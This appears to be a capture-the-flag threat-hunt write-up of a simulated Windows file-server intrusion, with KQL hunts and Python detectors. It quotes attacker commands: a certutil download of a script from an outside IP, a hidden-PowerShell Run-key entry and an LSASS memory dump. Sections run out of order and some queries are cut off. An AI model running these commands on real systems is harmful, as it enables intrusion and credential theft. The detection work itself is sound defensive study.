**🎯 Objective**
Registry autorun keys provide reliable persistence that executes on every system startup or user logon.
**📌 Finding**
FileShareSync
**🔍 Evidence**
| Field | Value |
|------------------|--------------------------------------------|
| Host | azuki-fileserver01 |
| Timestamp | 2025-11-22T02:10:50.8253766Z |
| Process | reg.exe |
| Parent Process | powershell |
| Command Line | `reg.exe" add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v FileShareSync /t REG_SZ /d "powershell -NoP -W Hidden -File C:\Windows\System32\svchost.ps1" /f` |
**💡 Why it matters**
Registry Run keys provide one of the most reliable and low-noise persistence mechanisms available to attackers, as they guarantee execution on every system startup or user logon. By choosing the value name FileShareSync, the attacker deliberately blends into expected enterprise software naming conventions, reducing the likelihood of casual discovery by administrators or users. The associated command launches a hidden PowerShell process that executes a script from a nonstandard system path, indicating continued control rather than a one-time payload. This persistence occurs after credential access and data exfiltration, strongly suggesting the attacker intends to maintain long-term access for follow-on operations or re-entry. This behavior maps directly to MITRE ATT&CK T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys, a technique commonly observed in hands-on-keyboard intrusions and ransomware precursor activity.
**🔧 KQL Query Used**
let timeattack5 = todatetime('2025-11-22T02:03:19.9845969Z');
DeviceRegistryEvents
| where TimeGenerated between ((timeattack5 - 1h) .. (timeattack5 + 1h))
| where DeviceName contains "azuki"
| project TimeGenerated, DeviceName, RegistryValueName, RegistryKey, RegistryValueData, InitiatingProcessCommandLine
**🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Use this query to proactively identify newly created or modified Run key values, especially those added via command-line tools like reg.exe or PowerShell. Pay close attention to value names that appear legitimate but point to scripts, hidden PowerShell execution, or binaries located outside standard program directories. Correlating these events with earlier credential access or exfiltration activity significantly increases detection confidence.
DeviceRegistryEvents
| where TimeGenerated > ago(30d)
| where ActionType == "RegistryValueSet"
| where RegistryKey has @"\Software\Microsoft\Windows\CurrentVersion\Run"
| where InitiatingProcessFileName in ("reg.exe", "powershell.exe", "cmd.exe")
| project TimeGenerated,
DeviceName,
RegistryValueName,
RegistryKey,
RegistryValueData,
InitiatingProcessFileName,
InitiatingProcessCommandLine
| order by TimeGenerated desc
### 🚩 Flag #19: PERSISTENCE - Beacon Filename
**🎯 Objective**
Process masquerading involves naming malicious files after legitimate Windows components to avoid suspicion.
**📌 Finding**
svchost.ps1
**🔍 Evidence**
| Field | Value |
|------------------|--------------------------------------------|
| Host | azuki-fileserver01 |
| Timestamp | 2025-11-22T02:10:50.8253766Z |
| Process | reg.exe |
| Parent Process | powershell |
| Command Line | `reg.exe" add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v FileShareSync /t REG_SZ /d "powershell -NoP -W Hidden -File C:\Windows\System32\svchost.ps1" /f` |
**💡 Why it matters**
Masquerading malicious payloads as legitimate Windows components is a deliberate evasion technique designed to bypass both human review and basic security controls. By naming the beacon svchost.ps1, the attacker abuses trust in the well-known svchost.exe process, increasing the likelihood that the file will be overlooked during triage or routine audits. Placing this script in C:\Windows\System32 further strengthens the disguise, as files in this directory are typically assumed to be trusted and system-managed. When combined with a registry Run key, this filename choice enables stealthy, long-term persistence with minimal operational noise. This activity aligns with MITRE ATT&CK T1036.005 – Masquerading: Match Legitimate Name or Location, a common technique in post-exploitation phases where attackers prioritize survivability over speed.
**🔧 KQL Query Used**
let timeattack5 = todatetime('2025-11-22T02:03:19.9845969Z');
DeviceRegistryEvents
| where TimeGenerated between ((timeattack5 - 1h) .. (timeattack5 + 1h))
| where DeviceName contains "azuki"
| project TimeGenerated, DeviceName, RegistryValueName, RegistryKey, RegistryValueData, InitiatingProcessCommandLine
**🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Hunt for script files (.ps1, .vbs, .js) located in system directories such as System32 or Windows\Logs, especially when referenced by autorun registry keys. Filenames that closely resemble legitimate Windows binaries (e.g., svchost, lsass, services) but use scripting extensions are high-confidence indicators of malicious persistence.
```kql
DeviceFileEvents
| where TimeGenerated > ago(30d)
| where FolderPath has_any ("\\Windows\\System32", "\\Windows\\SysWOW64")
| where FileName endswith ".ps1"
| where FileName has_any ("svchost", "lsass", "services", "winlogon")
| project TimeGenerated,
    DeviceName,
    FileName,
    FolderPath,
    InitiatingProcessFileName,
    InitiatingProcessCommandLine
| order by TimeGenerated desc
```
### 🚩 Flag #20: ANTI-FORENSICS - History File Deletion
**🎯 Objective**
PowerShell saves command history to persistent files that survive session termination. Attackers target these files to cover their tracks.
**📌 Finding**
ConsoleHost_history.txt
**🔍 Evidence**

| Field | Value |
|------------------|--------------------------------------------|
| Host | ConsoleHost_history.txt |
| Timestamp | 2025-11-22T02:26:01.1661095Z |
| Process | powershell.exe |
| Parent Process | explorer.exe |
| Command Line | N/A |

**💡 Why it matters**
PowerShell maintains a persistent command history file (ConsoleHost_history.txt) specifically to support forensic reconstruction after an interactive session ends. Deleting this file is a deliberate anti-forensics action intended to erase evidence of executed commands, tooling, and operator intent. This behavior is rarely performed during normal administrative activity and typically occurs after credential access, persistence, or lateral movement—once the attacker is attempting to reduce visibility and slow incident response. The timing of this deletion shortly after malicious PowerShell activity strongly suggests an effort to conceal hands-on-keyboard operations. This activity maps to MITRE ATT&CK T1070.003 – Indicator Removal on Host: Clear Command History, a common cleanup technique used by post-compromise operators to frustrate forensic timelines and hinder root cause analysis.
**🔧 KQL Query Used**
```kql
let timeattack5 = todatetime('2025-11-22T02:03:19.9845969Z');
DeviceFileEvents
| where TimeGenerated between ((timeattack5 - 1h) .. (timeattack5 + 1h))
| where DeviceName contains "azuki"
| where ActionType == "FileDel
```
**🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Monitor for deletion or truncation of PowerShell history files, particularly when initiated by powershell.exe or shortly following suspicious PowerShell execution. Correlate these events with credential access, registry persistence, or suspicious script execution to identify full attack chains.
```kql
DeviceFileEvents
| where TimeGenerated > ago(30d)
| where ActionType in ("FileDeleted", "FileDeletedByProcess")
| where FileName =~ "ConsoleHost_history.txt"
| project TimeGenerated,
    DeviceName,
    FileName,
    FolderPath,
    InitiatingProcessFileName,
    InitiatingProcessCommandLine
| order by TimeGenerated desc
```
## High-Level Summary
This intrusion represents a full-spectrum post-compromise attack leveraging valid credentials to re-enter the environment, move laterally via RDP, and systematically enumerate the network and host. The attacker demonstrated strong operational discipline by staging data in nonstandard system directories, abusing living-off-the-land binaries (LOLBins), and carefully sequencing actions to avoid early detection. Credential access via LSASS memory dumping marked a decisive escalation, followed by deliberate compression and exfiltration of sensitive data using both direct HTTP transfer and cloud-based file hosting to blend with legitimate traffic. Persistence was established through registry autorun keys using masqueraded filenames, and the operation concluded with targeted anti-forensic actions to remove PowerShell execution history. Overall, the activity reflects a capable adversary executing a methodical, goal-oriented campaign rather than opportunistic or automated malware.
**🛠️ Detection Recommendation**
**Hunting Tip:**
Use this query to hunt for attempts to hide files or directories using attribute modification, especially when initiated by scripting engines or non-interactive processes. Prioritize results on servers and shared systems, and look for attribute changes applied to system paths or uncommon directories. Correlate findings with prior discovery, credential access, or persistence activity to identify stealthy post-exploitation behavior.
```kql
DeviceProcessEvents
| where TimeGenerated > ago(30d)
| where FileName == "attrib.exe"
| where ProcessCommandLine has_any("+h", "+s")
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe")
| extend TargetPath = extract(@"([A-Z]:\\[^ ]+)", 1, ProcessCommandLine)
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, TargetPath, InitiatingProcessCommandLine
| order by TimeGenerated desc
```
### 🚩 Flag #9: COLLECTION - Staging Directory Path
**🎯 Objective**
Attackers establish staging locations to organise tools and stolen data before exfiltration. This directory path is a critical IOC.
**📌 Finding**
C:\Windows\Logs\CBS
**🔍 Evidence**

| Field | Value |
|------------------|--------------------------------------------|
| Host | azuki-fileserver01 |
| Timestamp | 2025-11-22T00:55:43.9986049Z |
| Process | attrib.exe |
| Parent Process | powershell.exe |
| Command Line | `"attrib.exe" +h +s C:\Windows\Logs\CBS` |

**💡 Why it matters**
Attackers commonly create staging directories to aggregate tools, scripts, and collected data before exfiltration, reducing noise and improving operational efficiency. Placing a staging directory under a trusted Windows path such as C:\Windows\Logs\CBS helps the activity blend into legitimate system files and evade casual inspection. The prior use of attribute manipulation to hide this directory further reinforces intent to conceal attacker activity rather than normal administrative use. This behavior aligns with MITRE ATT&CK T1074.001 – Data Staged: Local Data Staging, often observed shortly before data exfiltration or lateral movement. When a hidden staging directory is identified on a server, it represents a high-confidence indicator of post-compromise collection activity.
**🔧 KQL Query Used**
```kql
DeviceProcessEvents
| where Timestamp between (startofday(date(2025-11-22)) .. endofday(date(2025-11-22)))
| where DeviceName contains "azuki"
| where ProcessCommandLine has_any ("{", "[", "+", "|")
| where InitiatingProcessFileName == "powershell.exe"
| project Timestamp, DeviceName, ProcessCommandLine, InitiatingProcessCommandLine, FileName
| order by Timestamp asc
```
**🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Hunt for suspicious directories created or modified within trusted Windows paths that are rarely used for custom data storage. Focus on directories that are hidden, system-marked, or accessed by scripting engines rather than standard Windows services. Correlating directory creation or modification with prior discovery and defense evasion activity can help identify active staging locations before exfiltration occurs.
```kql
DeviceFileEvents
| where TimeGenerated > ago(30d)
| where FolderPath startswith @"C:\Windows\"
| where ActionType in ("FileCreated", "FolderCreated", "FileModified")
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe")
| extend SuspiciousPath = FolderPath
| project TimeGenerated, DeviceName, AccountName, ActionType, SuspiciousPath, InitiatingProcessCommandLine
| order by TimeGenerated desc
```
### 🚩 Flag #10: DEFENSE EVASION - Script Download Command
**🎯 Objective**
Legitimate system utilities with network capabilities are frequently weaponized to download malware while evading detection.
**📌 Finding**
"certutil.exe" -urlcache -f http://78.141.196.6:7331/ex.ps1 C:\Windows\Logs\CBS\ex.ps1
**🔍 Evidence**

| Field | Value |
|------------------|--------------------------------------------|
| Host | azuki-fileserver01 |
| Timestamp | 2025-11-22T00:56:47.4100711Z |
| Process | certutil.exe |
| Parent Process | powershell.exe |
| Command Line | `"certutil.exe" -urlcache -f http://78.141.196.6:7331/ex.ps1 C:\Windows\Logs\CBS\ex.ps1` |

**💡 Why it matters**
certutil.exe is a signed, Microsoft-shipped certificate utility, so its `-urlcache -f` download of an arbitrary URL to disk rarely trips controls that key on unknown binaries. Here it was launched from powershell.exe to fetch ex.ps1 from 78.141.196.6:7331 directly into the hidden staging directory C:\Windows\Logs\CBS, so the download and the staging location corroborate each other. This is the ingress tool transfer step of the intrusion: the attacker is bringing follow-on tooling onto the host rather than relying only on what is already present. Plain HTTP to a bare IP address on a nonstandard port from a file server is a high-signal indicator in its own right. The certutil LOLBin pattern maps to MITRE ATT&CK T1105 – Ingress Tool Transfer, with the choice of a trusted signed utility providing the defense evasion that gives this flag its name.
**🔧 KQL Query Used**
```kql
DeviceProcessEvents
| where Timestamp between (startofday(date(2025-11-22)) .. endofday(date(2025-11-22)))
| where DeviceName contains "azuki"
| where InitiatingProcessFileName == "powershell.exe" and InitiatingProcessCommandLine !contains "Windows Defender Advanced Threat Protection"
| project Timestamp, DeviceName, ProcessCommandLine, InitiatingProcessCommandLine, FileName
| order by Timestamp asc
```
**🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Focus hunting on signed Windows utilities with network functionality (LOLBINs) executing outbound downloads, especially when initiated by scripting engines. Pay close attention to downloads targeting unusual directories such as C:\Windows\Logs\ or user-writable system paths. Correlating certutil usage with prior staging, discovery, or defense evasion activity significantly increases detection fidelity.
```kql
DeviceProcessEvents
| where TimeGenerated > ago(30d)
| where FileName == "certutil.exe"
| where ProcessCommandLine has_any ("-urlcache", "http://", "https://")
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe")
| extend DownloadURL = extract(@"(http[s]?://[^\s]+)", 1, ProcessCommandLine)
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, DownloadURL, InitiatingProcessCommandLine
| order by TimeGenerated desc
```
### 🚩 Flag #11: COLLECTION - Credential File Discovery
**🎯 Objective**
Credential files provide keys to the kingdom - enabling lateral movement and privilege escalation across the network.
**📌 Finding**
IT-Admin-Passwords.csv
**🔍 Evidence**

| Field | Value |
|------------------|--------------------------------------------|
| Host | azuki-fileserver01 |
| Timestamp | 2025-11-22T01:07:53.6746323Z |
| Process | xcopy.exe |
| Parent Process | N/A |
| Command Line | `"xcopy.exe" C:\FileShares\IT-Admin C:\Windows\Logs\CBS\it-admin /E /I /H /Y` |

**💡 Why it matters**
Credential files such as spreadsheets or CSVs containing administrative passwords represent some of the highest-value assets an attacker can obtain during an intrusion. By copying an entire IT administrator directory into a hidden staging location, the attacker is clearly preparing credentials for later use, exfiltration, or offline analysis. Possession of valid admin credentials enables rapid lateral movement, privilege escalation, and often full domain compromise without the need for noisy exploitation. This activity maps directly to MITRE ATT&CK T1552.001 – Unsecured Credentials: Credentials in Files, a technique frequently observed in real-world breaches and ransomware operations. File copy utilities like xcopy.exe performing bulk transfers from file shares into concealed directories are a strong, high-signal indicator of credential harvesting rather than legitimate administration.
**🔧 KQL Query Used**
```kql
let timeofattack = todatetime('2025-11-22T00:40:29.5749856Z');
DeviceFileEvents
| where TimeGenerated between ((timeofattack - 1h) .. (timeofattack + 1h))
| where DeviceName contains "azuki"
| where InitiatingProcessAccountName != "system"
| where ActionType == "FileCreated"
| project TimeGenerated, ActionType, DeviceName, FileName, FolderPath, InitiatingProcessCommandLine
```
**🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Hunt for non-system users copying large numbers of files from shared directories—especially IT, Finance, or Admin shares—into uncommon or hidden system paths. Prioritize activity involving archive, copy, or synchronization utilities staging data shortly after discovery or credential access events, as this often precedes exfiltration or lateral movement.
```kql
DeviceFileEvents
| where TimeGenerated > ago(30d)
| where ActionType in ("FileCreated", "FileCopied")
| where InitiatingProcessFileName in ("xcopy.exe", "robocopy.exe", "powershell.exe", "cmd.exe")
// Destination: the copied file lands in an uncommon or hidden system path
| where FolderPath has_any ("\\Windows\\Logs\\", "\\ProgramData\\", "\\Temp")
// Source: DeviceFileEvents only records the destination path, so the share being
// copied from has to be read from the copying process's own command line
| where InitiatingProcessCommandLine has_any ("\\FileShares\\", "\\IT", "\\Admin")
// !~ is case-insensitive; the account is typically logged as "system"
| where InitiatingProcessAccountName !~ "SYSTEM"
| project TimeGenerated, DeviceName, AccountName=InitiatingProcessAccountName,
    FileName, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
```
### 🚩 Flag #12: COLLECTION - Recursive Copy Command
**🎯 Objective**
Built-in system utilities are preferred for data staging as they're less likely to trigger security alerts. The exact command line reveals attacker methodology.
**📌 Finding**
"xcopy.exe" C:\FileShares\IT-Admin C:\Windows\Logs\CBS\it-admin /E /I /H /Y
**🔍 Evidence**

| Field | Value |
|------------------|--------------------------------------------|
| Host | azuki-fileserver01 |
| Timestamp | 2025-11-22T01:07:53.6430063Z |
| Process | xcopy.exe |
| Parent Process | powershell.exe |
| Command Line | `"xcopy.exe" C:\FileShares\IT-Admin C:\Windows\Logs\CBS\it-admin /E /I /H /Y` |

**💡 Why it matters**
This activity confirms deliberate and systematic data collection rather than incidental file access. The attacker repeatedly used xcopy.exe to copy multiple high-value enterprise file shares (Contracts, Financial, IT-Admin, Shipping) into a single hidden staging directory, strongly indicating preparation for exfiltration or encryption. The consistency of tooling, destination path, and command-line switches shows hands-on keyboard activity aligned with human-operated intrusion behavior. Staging sensitive business and credential data locally is a common precursor to data theft, ransomware deployment, or double-extortion operations. This behavior maps directly to MITRE ATT&CK T1074.001 – Data Staged: Local Data Staging, with supporting elements of T1119 – Automated Collection, and represents a high-confidence indicator of attacker intent rather than reconnaissance alone.
**🔧 KQL Query Used**
```kql
let timeattack = todatetime('2025-11-22T00:40:29.5749856Z');
DeviceProcessEvents
| where TimeGenerated between ((timeattack - 3h) .. (timeattack + 3h))
| where DeviceName contains "azuki"
| where FileName in ("robocopy.exe", "xcopy.exe")
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName
| order by TimeGenerated asc
```
**🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Focus on native file-copy utilities writing multiple distinct source directories into a single destination path within a short time window. Repeated use of xcopy.exe, robocopy.exe, or copy targeting unusual or hidden directories (especially under C:\Windows\) is a strong signal of staging activity and should be prioritized over single copy events.
```kql
DeviceProcessEvents
| where TimeGenerated > ago(30d)
| where FileName in ("xcopy.exe", "robocopy.exe")
| where ProcessCommandLine has_any ("/E", "/I", "/H")
| where ProcessCommandLine contains @"C:\Windows\"
// First drive-rooted path is the source, the second is the destination
| extend SourcePath = extract(@"([A-Za-z]:\\[^ ]+)", 1, ProcessCommandLine),
         DestPath = extract(@"[A-Za-z]:\\[^ ]+\s+([A-Za-z]:\\[^ ]+)", 1, ProcessCommandLine)
// Group by destination rather than by the full command line: grouping on the
// command line would put each distinct copy in its own row and DistinctSources
// could never exceed 1, so several shares staged into one folder would be missed
| summarize CopyCount = count(),
            DistinctSources = dcount(SourcePath),
            Sources = make_set(SourcePath, 20),
            FirstSeen = min(TimeGenerated),
            LastSeen = max(TimeGenerated)
    by DeviceName, AccountName, DestPath
| where CopyCount >= 2 or DistinctSources >= 2
| order by LastSeen desc
```
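The staging logic of this hunt as a stand-alone Python model (an added example, not code from this repository): copies are grouped by host and staging root, and a root is reported only when several distinct sources land in it within a short window. The events, account names and minute offsets are constructed; the staging root is assumed to be the parent folder of each copy's destination, matching the per-share subfolders under C:\Windows\Logs\CBS in this scenario.

```python
"""Staging-copy detector modelled on the Flag #12 hunt: several distinct source
directories copied by xcopy/robocopy into one destination inside a short window.
Added example; events below are constructed, not telemetry from the scenario."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# A drive-rooted path, either double-quoted (may contain spaces) or bare.
_PATH = re.compile(r'"([A-Za-z]:\\[^"]+)"|([A-Za-z]:\\[^\s]+)')


def parse_copy(cmdline):
    """Return (source, destination) from an xcopy/robocopy command line, or None.
    The first two drive-rooted paths are source and destination; a fully
    qualified path to the copy tool itself (...\\xcopy.exe) is skipped."""
    paths = [q or bare for q, bare in _PATH.findall(cmdline)]
    paths = [p for p in paths if not p.lower().endswith(".exe")]
    if len(paths) < 2:
        return None
    return paths[0].rstrip("\\"), paths[1].rstrip("\\")


def find_staging(events, window=timedelta(hours=1), min_sources=2):
    """events: (timestamp, host, account, image name, command line) tuples.
    Copies are grouped by host and staging root (assumed here to be the parent
    folder of the destination, matching the per-share subfolders of
    C:\\Windows\\Logs\\CBS in the scenario). A root is reported when at least
    `min_sources` distinct sources were copied into it within `window`.
    Re-running the identical command does not add a distinct source."""
    by_root = defaultdict(list)
    for ts, host, account, image, cmd in events:
        if image.lower() not in ("xcopy.exe", "robocopy.exe"):
            continue
        parsed = parse_copy(cmd)
        if parsed is None:
            continue
        src, dst = parsed
        root = dst.lower().rsplit("\\", 1)[0]
        by_root[(host, root)].append((ts, account, src.lower()))

    findings = []
    for (host, root), rows in by_root.items():
        rows.sort()
        for start, _, _ in rows:            # sliding window over the copies
            in_win = [r for r in rows if start <= r[0] <= start + window]
            sources = sorted({r[2] for r in in_win})
            if len(sources) >= min_sources:
                findings.append({
                    "host": host,
                    "staging_root": root,
                    "accounts": sorted({r[1] for r in in_win}),
                    "copy_count": len(in_win),
                    "sources": sources,
                    "first_seen": in_win[0][0],
                    "last_seen": in_win[-1][0],
                })
                break                        # one finding per staging root
    return findings


# Constructed sample events (account name and minute offsets are made up).
T0 = datetime(2025, 11, 22, 1, 7, 53)
SAMPLE_EVENTS = [
    (T0, "azuki-fileserver01", "user1", "xcopy.exe",
     r'"xcopy.exe" C:\FileShares\IT-Admin C:\Windows\Logs\CBS\it-admin /E /I /H /Y'),
    (T0 + timedelta(minutes=2), "azuki-fileserver01", "user1", "xcopy.exe",
     r'"xcopy.exe" C:\FileShares\Financial C:\Windows\Logs\CBS\financial /E /I /H /Y'),
    (T0 + timedelta(minutes=5), "azuki-fileserver01", "user1", "xcopy.exe",
     r'"xcopy.exe" C:\FileShares\Contracts C:\Windows\Logs\CBS\contracts /E /I /H /Y'),
    # Scheduled backup: the same single source every hour, so it is not reported.
    (T0 + timedelta(hours=3), "azuki-fileserver01", "svc_backup", "robocopy.exe",
     r'robocopy.exe C:\FileShares\Shipping D:\Backups\Shipping /E /R:1'),
    (T0 + timedelta(hours=4), "azuki-fileserver01", "svc_backup", "robocopy.exe",
     r'robocopy.exe C:\FileShares\Shipping D:\Backups\Shipping /E /R:1'),
]

if __name__ == "__main__":
    for f in find_staging(SAMPLE_EVENTS):
        print(f"{f['host']}: {f['copy_count']} copies from {len(f['sources'])} "
              f"sources into {f['staging_root']} ({f['first_seen']} .. {f['last_seen']})")
```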
### 🚩 Flag #13: COLLECTION - Compression Command
**🎯 Objective**
Cross-platform compression tools indicate attacker sophistication. The full command line reveals the exact archiving methodology used.
**📌 Finding**
"tar.exe" -czf C:\Windows\Logs\CBS\credentials.tar.gz -C C:\Windows\Logs\CBS\it-admin .
**🔍 Evidence**

| Field | Value |
|------------------|--------------------------------------------|
| Host | azuki-fileserver01 |
| Timestamp | 2025-11-22T01:30:10.0981853Z |
| Process | tar.exe |
| Parent Process | powershell.exe |
| Command Line | `"tar.exe" -czf C:\Windows\Logs\CBS\credentials.tar.gz -C C:\Windows\Logs\CBS\it-admin` |

**💡 Why it matters**
The use of tar.exe on a Windows system is a strong indicator of deliberate attacker tradecraft rather than routine administrative activity. Attackers commonly compress staged data to reduce size, preserve directory structure, and prepare files for rapid exfiltration or encryption. In this case, the archive targets a hidden staging directory (C:\Windows\Logs\CBS\it-admin) that already contains harvested credential material, confirming this activity as a late-stage collection step rather than benign maintenance. Compression marks a clear transition from discovery and collection into exfiltration readiness, meaning containment urgency is high. This behavior aligns with MITRE ATT&CK T1560.001 – Archive Collected Data: Archive via Utility, a technique frequently observed immediately prior to data theft or ransomware deployment.
**🔧 KQL Query Used**
```kql
let timeattack4 = todatetime('2025-11-22T01:07:53.6430063Z');
DeviceProcessEvents
| where TimeGenerated between ((timeattack4 - 2h) .. (timeattack4 + 2h))
| where DeviceName contains "azuki"
| where FileName in ("tar.exe", "gzip.exe")
| project TimeGenerated, DeviceName, AccountName, ActionType, ProcessCommandLine, InitiatingProcessCommandLine, FolderPath
| order by TimeGenerated desc
```
**🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Use this query during proactive threat hunts to identify archive creation from suspicious or nonstandard directories (e.g., Windows\Logs, Temp, user-writable system paths). Pay close attention to compression tools executed by scripting engines such as PowerShell, and correlate results with earlier file copy or credential discovery activity to confirm malicious staging behavior.
```kql
DeviceProcessEvents
| where TimeGenerated > ago(30d)
| where FileName in ("tar.exe", "gzip.exe", "7z.exe", "rar.exe")
| where ProcessCommandLine has_any (".zip", ".tar", ".tar.gz", ".7z", ".rar")
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe")
| project TimeGenerated,
    DeviceName,
    AccountName,
    FileName,
    ProcessCommandLine,
    InitiatingProcessCommandLine
| order by TimeGenerated desc
```
### 🚩 Flag #14: CREDENTIAL ACCESS - Renamed Tool
**🎯 Objective**
Renaming credential dumping tools is a basic OPSEC practice to evade signature-based detection.
**📌 Finding**
pd.exe
**🔍 Evidence**

| Field | Value |
|------------------|--------------------------------------------|
| Host | azuki-fileserver01 |
| Timestamp | 2025-11-22T02:03:19.9845969Z |
| Process | powershell.exe |
| Parent Process | powershell.exe |
| Command Line | `powershell.exe` |

**💡 Why it matters**
Renaming credential dumping tools is a common evasion technique used to bypass signature-based detections that rely on known filenames such as mimikatz.exe. The appearance of an unfamiliar executable (pd.exe) created shortly before credential access activity strongly suggests a renamed or custom-packed dumping utility. Attackers frequently stage these tools under innocuous names to blend into the environment and delay defender response. When combined with prior collection, staging, and compression behavior, this indicates the attacker is actively attempting to harvest credentials for lateral movement or privilege escalation. This activity maps to MITRE ATT&CK T1003 – OS Credential Dumping, with evasion via T1036 – Masquerading, and represents a high-confidence signal of hands-on-keyboard adversary activity.
**🔧 KQL Query Used**
```kql
let timeattack4 = todatetime('2025-11-22T01:07:53.6430063Z');
DeviceFileEvents
| where TimeGenerated between ((timeattack4 - 1h) .. (timeattack4 + 1h))
| where DeviceName contains "azuki"
| where ActionType == "FileCreated"
| project TimeGenerated, DeviceName, ActionType, FileName, InitiatingProcessCommandLine, FolderPath
| order by TimeGenerated desc
```
**🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Use this query to hunt for newly created executables in atypical directories that are shortly followed by credential access, discovery, or compression activity. Prioritize binaries launched by PowerShell or created outside standard install paths, especially on servers and high-value systems. Correlating file creation with suspicious process execution within a short time window significantly increases detection confidence.
```kql
DeviceFileEvents
| where TimeGenerated > ago(30d)
| where ActionType == "FileCreated"
| where FileName endswith ".exe"
| where FolderPath has_any ("\\Windows\\Logs\\", "\\Temp\\", "\\ProgramData\\")
| project TimeGenerated,
    DeviceName,
    FileName,
    FolderPath,
    InitiatingProcessCommandLine
| order by TimeGenerated desc
```
### 🚩 Flag #15: CREDENTIAL ACCESS - Memory Dump Command
**🎯 Objective**
The complete process memory dump command line is critical evidence showing exactly how credentials were extracted.
**📌 Finding**
"pd.exe" -accepteula -ma 876 C:\Windows\Logs\CBS\lsass.dmp
**🔍 Evidence**

| Field | Value |
|------------------|--------------------------------------------|
| Host | azuki-fileserver01 |
| Timestamp | 2025-11-22T02:24:44.3906047Z |
| Process | pd.exe |
| Parent Process | powershell.exe |
| Command Line | `"pd.exe" -accepteula -ma 876 C:\Windows\Logs\CBS\lsass.dmp` |

**💡 Why it matters**
Dumping the memory of LSASS (Local Security Authority Subsystem Service) is one of the most reliable indicators of credential theft on Windows systems. LSASS stores sensitive authentication material including plaintext credentials, NTLM hashes, and Kerberos tickets for logged-on users. In this case, the attacker used a renamed credential dumping tool (pd.exe) with explicit memory dump arguments (-ma) to target the LSASS process, confirming intentional credential access rather than accidental or benign behavior. Writing the dump file to a disguised staging directory (C:\Windows\Logs\CBS) further demonstrates attacker OPSEC and an attempt to evade casual inspection. This activity maps directly to MITRE ATT&CK T1003.001 – OS Credential Dumping: LSASS Memory, a high-impact technique frequently used to enable privilege escalation, lateral movement, and full domain compromise. Detection of LSASS dumping should be treated as a containment-critical event.
**🔧 KQL Query Used**
```kql
let timeattack5 = todatetime('2025-11-22T02:03:19.9845969Z');
DeviceProcessEvents
| where TimeGenerated between ((timeattack5 - 1h) .. (timeattack5 + 1h))
| where DeviceName contains "azuki"
| where ProcessCommandLine contains "pd.exe"
| project TimeGenerated, DeviceName, ActionType, ProcessCommandLine, FileName, InitiatingProcessCommandLine, FolderPath
| order by TimeGenerated desc
```
**🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
When hunting for credential dumping, prioritize behavior over tool names. Attackers frequently rename utilities like ProcDump to evade signature-based detections, but LSASS dumping still requires distinctive command-line flags and access patterns. Focus on memory dump arguments (-ma, MiniDump, .dmp) combined with references to LSASS or dump files written to nonstandard directories.
```kql
DeviceProcessEvents
| where TimeGenerated > ago(30d)
| where ProcessCommandLine has_any ("lsass", "-ma", ".dmp")
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe")
| project TimeGenerated,
    DeviceName,
    AccountName,
    FileName,
    ProcessCommandLine,
    InitiatingProcessCommandLine,
    FolderPath
| order by TimeGenerated desc
```
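The "behavior over tool names" point of this hunting tip as a stand-alone Python triage routine (an added example, not code from this repository). It scores a command line on the dump switch, the .dmp output and the target, and resolves a bare PID against a process-table snapshot so that a renamed tool with an innocuous output filename is still caught; the process table, the `procdump64.exe` and `mem.dmp` variants and the `assess_dump_command` helper are constructed for the example, while PID 876 and the pd.exe command line come from the scenario.

```python
"""Tool-agnostic LSASS-dump triage modelled on the Flag #15 hunt: score a
process command line by what it does, not by the binary's name. Added
example; command lines other than the scenario's and the process table are
constructed."""
import re

# Dump switches in the hunt (ProcDump style) plus the comsvcs MiniDump export name.
DUMP_SWITCHES = {"-ma", "-mm", "-mp", "minidump"}
_TOKENS = re.compile(r'"([^"]*)"|(\S+)')


def assess_dump_command(cmdline, process_table):
    """process_table maps PID -> image name on the host at that moment (from an
    inventory or a DeviceProcessEvents join in practice; a constructed dict here).
    Returns the signals seen and a severity. A renamed tool (pd.exe) gets the
    same verdict as procdump.exe because only behaviour is scored, and a target
    given as a bare PID is resolved through the table so a harmless-looking
    output filename does not hide the LSASS target."""
    toks = [q or bare for q, bare in _TOKENS.findall(cmdline)]
    low = [t.lower() for t in toks]
    signals = []
    if any(t in DUMP_SWITCHES for t in low):
        signals.append("memory-dump switch")
    if any(t.endswith(".dmp") for t in low):
        signals.append("dump file written")
    targets_lsass = False
    for t in low:
        if "lsass" in t:
            targets_lsass = True
            signals.append(f"lsass named on the command line: {t}")
        elif t.isdigit() and process_table.get(int(t), "").lower() == "lsass.exe":
            targets_lsass = True
            signals.append(f"PID {t} resolves to lsass.exe")
    if targets_lsass and len(signals) > 1:
        severity = "high"        # dump activity aimed at LSASS: containment-critical
    elif "memory-dump switch" in signals and "dump file written" in signals:
        severity = "medium"      # a process dump, but not of LSASS: review the target
    else:
        severity = "low"
    return {"image": toks[0] if toks else "", "signals": signals, "severity": severity}


# Constructed process-table snapshot; PID 876 matches the scenario's command line.
PROCESS_TABLE = {4: "System", 876: "lsass.exe", 4242: "w3wp.exe"}
SCENARIO_CMD = r'"pd.exe" -accepteula -ma 876 C:\Windows\Logs\CBS\lsass.dmp'
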